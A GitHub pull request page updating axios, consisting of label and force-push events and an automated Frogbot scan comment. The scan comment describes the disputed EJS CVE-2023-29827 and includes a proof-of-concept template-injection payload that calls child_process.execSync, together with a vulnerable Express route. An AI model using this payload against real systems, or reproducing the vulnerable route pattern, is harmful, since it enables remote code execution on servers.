Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Updated axios #97

Open
wants to merge 4 commits into
base: master
Choose a base branch
from
Open

Conversation

eyalk007
Copy link

Updated axios version without a vulnerability

@eyalk007 eyalk007 added dependencies Pull requests that update a dependency file safe to test Approve running integration tests on a pull request labels Oct 13, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 13, 2024
@eyalk007 eyalk007 force-pushed the enhancement/updated-axios branch from 99c17de to 8b084e1 Compare October 13, 2024 11:40
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 13, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 13, 2024
@eyalk007 eyalk007 force-pushed the enhancement/updated-axios branch from 8b084e1 to 90ec1f2 Compare October 14, 2024 09:01
@eyalk007 eyalk007 requested a review from attiasas October 14, 2024 09:03
@eyalk007 eyalk007 self-assigned this Oct 14, 2024
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 14, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 14, 2024
@eyalk007 eyalk007 force-pushed the enhancement/updated-axios branch from 90ec1f2 to 0dfe4c6 Compare October 14, 2024 09:05
@eyalk007 eyalk007 force-pushed the enhancement/updated-axios branch from 0dfe4c6 to 9864fe0 Compare October 14, 2024 09:08
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 14, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 14, 2024
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@eyalk007 eyalk007 force-pushed the enhancement/updated-axios branch from 867b92f to a8a2892 Compare October 16, 2024 20:36
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 16, 2024
Copy link

🚨 Frogbot scanned this pull request and found the below:

📦 Vulnerable Dependencies

✍️ Summary

SEVERITY CONTEXTUAL ANALYSIS DIRECT DEPENDENCIES IMPACTED DEPENDENCY FIXED VERSIONS CVES

Critical
Not Applicable ts-jest:29.2.5 ejs 3.1.10 - CVE-2023-29827

🔬 Research Details

Description:
Embedded JavaScript templates, also known as EJS, is one of the most popular Node.js templating engines, which is compiled with the Express JS view system.

When rendering views using EJS, it is possible to bypass ejs' template injection restrictions, by abusing the closeDelimiter rendering option, in the case when -

  1. The template itself can be partially controlled by the attacker
  2. The template rendering options can be fully controlled by the attacker

The vulnerability was rightfully disputed due to the fact that a vulnerable configuration is extremely unlikely to exist in any real-world setup. As such, the maintainers will not provide a fix for this (non-)issue.

Example of a vulnerable application -

const express = require('express')
const app = express()
const port = 3000

app.set('view engine', 'ejs');

app.get('/page', (req,res) => {
    res.render('page', req.query); // OPTS (2nd parameter) IS ATTACKER-CONTROLLED
})

app.listen(port, () => {
  console.log("Example app listening on port ${port}")
})

Contents of page.ejs (very unlikely to be attacker controlled) -

%%1");process.mainModule.require('child_process').execSync('calc');//

In this case, sending closeDelimiter with the same malicious code that already exists at page.ejs will trigger the injection -
http://127.0.0.1:3000/page?settings[view%20options][closeDelimiter]=1")%3bprocess.mainModule.require('child_process').execSync('calc')%3b//


@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@eyalk007 eyalk007 force-pushed the enhancement/updated-axios branch from db1afe8 to 39a2038 Compare October 16, 2024 23:00
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 16, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
dependencies Pull requests that update a dependency file
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant